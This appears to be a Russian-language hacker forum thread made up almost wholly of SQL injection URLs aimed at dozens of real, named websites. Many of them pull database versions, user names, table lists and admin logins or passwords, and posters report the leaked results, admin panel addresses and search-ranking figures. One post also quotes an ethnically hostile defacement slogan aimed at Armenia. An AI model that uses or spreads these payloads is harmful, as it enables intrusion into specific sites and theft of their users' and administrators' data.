PHP: http://www.indiajournal.com/pages/event.php?id=-11753'union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+--+ http://www.indiajournal.com/pages/event.php?id=-11753'union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.tAbLes+limit+33,1+--+ 5.1.39-log:ij:[email protected] ТИЦ10 PR5 PHP: http://metronics.ru/good.php?id=-973347913+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11-- http://metronics.ru/good.php?id=-973347913+union+select+1,concat(login),3,4,5,6,7,8,9,10,11+from+admin-- http://metronics.ru/admin/login.php 4.1.25-log:wwwmetronicsru:metronic@localhost ТИЦ80 PR3
ну вот перебили , продолжу здесь Международный аэропорт санфранцизко Code: http://www.airportsfo.org/parking/lot.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13+--+ Code: http://www.romancecollection.com/auction/lot.php?id=1146+and+1=0+union+select+1,2,3,4,concat(emails,char(58),rows),6,7,8+from+d60577836.rc_settings%20+--+ Code: http://www.ducky-games.com/lot.php?id=-271+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12+--+
http://peticije.org/page.petition.sign.php?id=-1606+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--
в print версии все выводится http://murashka.com.ua/cms/card.php?id=3+and+1=2+union+select+1,user(),3,4,5,6,7,8,9,10--&print=1
PHP: http://www.cartagenamarina.es/weather.php?id=-3+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,230,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106-- PHP: http://www.econotrav.com/weather.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6-- PHP: http://www.econotrav.com/admin расшифровать хеш я не смог админский
http://harmony.musigi-dunya.az/rus/archclouselist.asp?iss=12+union+select+1,2,3+from+msysaccessobjects https://www.mirvaritravel.az/v2/rez3.asp?id=440+and+1=@@version http://www.sarayevim.com/rus/ilan_yazdir.asp?id=6+and+row(1,2)in(select+count(*),concat((select+concat_ws(0x3a,@@version,@@version_comment,@@version_compile_machine,@@version_compile_os)+from+information_schema.tables+limit+20,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a) http://www.filmiran.org/pages/showdetailsnews.asp?offset=399&IDN=36+union+select+1,2,3,4,5,6,7,8,9,10+from+msysaccessobjects http://www.peterfige.com/dvds.php?added=1&dvd=2+and+substring(version(),1,1)=3
покер PHP: http://www.jeux-poker-en-ligne.com/salle-poker.php?id=-8+order+by+27-- [email protected] 4.1.20-max-log migueli_casino ни логинов ни паролей не нашел тут=( PHP: http://www.gppoker.be/agenda-gp-poker.php?id=-11+union+select+1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5--&PHPSESSID=b79746845571ef3b7119d794e744fc90 5.0.90-log:gppokergadmin:[email protected]c-linux-gnu PHP: http://www.fr-poker-online.com/poker.php?ID=-32+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11-- 5.0.90-log:frpokerofrance:[email protected]c-linux-gnu
http://www.renewal-avto.ru/info.php?id=11+and+1=0+union+select+1,2,3,4,concat(login,char(58),password),6,7+from+avtorw.users+--+ и админко http://www.renewal-avto.ru/admin
PHP: http://www.funnyboss.com/friend.php?id=-52+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10-- 5.0.51a-24+lenny2:funny:ccole@localhost:debian-linux-gnu PHP: http://www.pakvisit.com/friend.php?id=53+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
PHP: http://www.synco.ru/razdel.php?id=-183+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4-- 5.0.83-log:synco_db:synco@misantrop2
http://www.kamosline.ru/articles/news/detail.php?ID=8169+and+1=0+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+ ТИЦ: 20 http://www.sportbars.ru/view_transl.php?id=820+UnIon+selECt+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15+--+ ТИЦ: 50 http://www.maxipool.ru/articles_view.php?id=1+and+1=0+union+select+1,group_concat(table_name),3+from+information_schema.tables--+ Google PageRank: 2 http://paritetbk.ru/?vs=home&page=foto&xx=1&razd_id=59+group+by+4+--+ http://www.smolensk-i.ru/view_article.php?news_id=234+and+1=0+union+select+1,2,3,version(),5,6,7+--+ ТИЦ: 20 Google PageRank: 3 http://www.fordimola.ru/?menu_id=1&page_id=656+group+by+7+--+ ТИЦ: 60 http://www.perepelcina.com/index.php?link=2&id=71+and+1=0+union+select+version(),2,3,4,5,6,7,8,9,10+--+ ТИЦ: 20 Google PageRank: 1 http://www.realtaim.ru/catalog?item_id=72+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+ ТИЦ: 110 Google PageRank: 3 http://www.detki.ru/?page=-5+union+select+1,2,group_concat(table_name),4+from+information_schema.tables--+ ТИЦ: 190 Google PageRank: 4 http://www.rus-vent.ru/?menu=page&id=21+group+by+2+--+ ТИЦ : 80 PR: 3 http://www.garden-center.ru/morenews.php?mode=full&id=28+and+1=0+UnIon+selECt+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables--+&marker=%CD%EE%E2%EE%F1%F2%E8 ТИЦ : 10 PR: 2 http://www.kiddypages.ru/index.php?item_full&t=import&id=-117+UnIon+selECt+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+where+table_Schema=0x6b696464797061676573+--+ ТИЦ : 110
Code: http://www.mardesombras.com/mds/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 2 Code: http://www.skflamurtari.com/flotakuqezi/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 3 Code: http://www.mma-france.net/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 3 Code: http://www.portalmotociclista.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 Code: http://www.handi-occasion.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.dama.in.rs/old_version/htdocs/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 2 Code: http://www.tingis.be/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 3 Code: http://www.palermoincosplay.net/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 0 Code: http://www.mzonline.po.gs/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) Code: http://www.bafraresim.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.cuisine-marocaine.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.vranjeportal.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.onodenje.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.festacirera.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 3 Code: http://liveab1.de/xoops/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.linerider.fr/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 3 Code: http://www.giovaniprofessionisti.it/it//modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 3 Code: http://www.arabecontact.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 5 Code: http://www.sintasa-se.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 2 Code: http://www.portalmotociclista.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 1 Code: http://www.cuisine-marocaine.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.allnight.it/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 2 http://www.opc4all.de/intern/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 Code: http://www.handi-occasion.com/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.onodenje.com/vip/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 4 Code: http://www.sintasa-se.com.br/modules/xmmemberstats/index.php?letter=&sortby=uname%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat(version(),floor(rand(0)*2))) тИЦ — 10 PR — 2
Code: We are from Azerbaijan. Fuck you armenia! боюсь они всю жизнь остануться такими же ламерами и смешными 99% дефейсер - k2b1~ aka LokbatanLi, которого забанили за неодекватное поведение и за дефейсы сайтов которые другие раскрутили з.ы. не разазлите меня со своими глупо национальными дефейсами, а то плохо закончиться! </offtop>
ну а теперь в продолжении темы дефейса, заметил что при переходе на главную задефейсенного сайта данные грузятся с http://trytobe.us/ Поэтому могу сказать- на дефейсь свой сайт Code: http://trytobe.us/account.php?id=-1+union+select+1,concat(login,char(58),user_password),3,4,5,6+from+users+--+
http://www.unico94.ru/review/obzor_nalogi/?id=566+and+1=0+union+select+1,version()+--+ ТИЦ : 130 Так же есть доступ к mysql.user ,но нету прав на запись http://xk5.com.ua/adv.php?id_sgroop=885+and+1=0+union+select+group_concat(schema_name)+from+information_schema.schemata+--+ ТИЦ : 30 PR: 4 http://www.i-tilzit.ru/?id=26+and+1=0+union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=0x76657465725f6d61696e+--+ ТИЦ : 10 PR: 3 http://www.gorodetc.ru/business/index.php?id=12+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema=0x7975726963685f677264+--+ ТИЦ : 40 PR: 2 http://www.ibg-property.com/category.php?id=-4+union+select+1,version(),3,4,5,6,7,8,9,10,11,12+--+ http://www.dipris.com/visual.php?article_id=186+and+1=0+union+select+1,2,version%28%29,4,5,6,7,8,9+--+ ТИЦ : 10 есть доступ к mysql.user ,но нету прав на запись http://www.songsuda.com/car_details.php?id=2+UnIon+selECt+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=0x736f6e67737564615f646220--+ PR: 2 http://www.krasydom.ru/index.php?l_id=293+and+1=0+union+select+1,2,3,group_concat(schema_name),5,6+from+information_schema.schemata--+ ТИЦ : 40 Много схем к разным сайтам
http://www.eowave.com/products.php?prod=9+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+customer
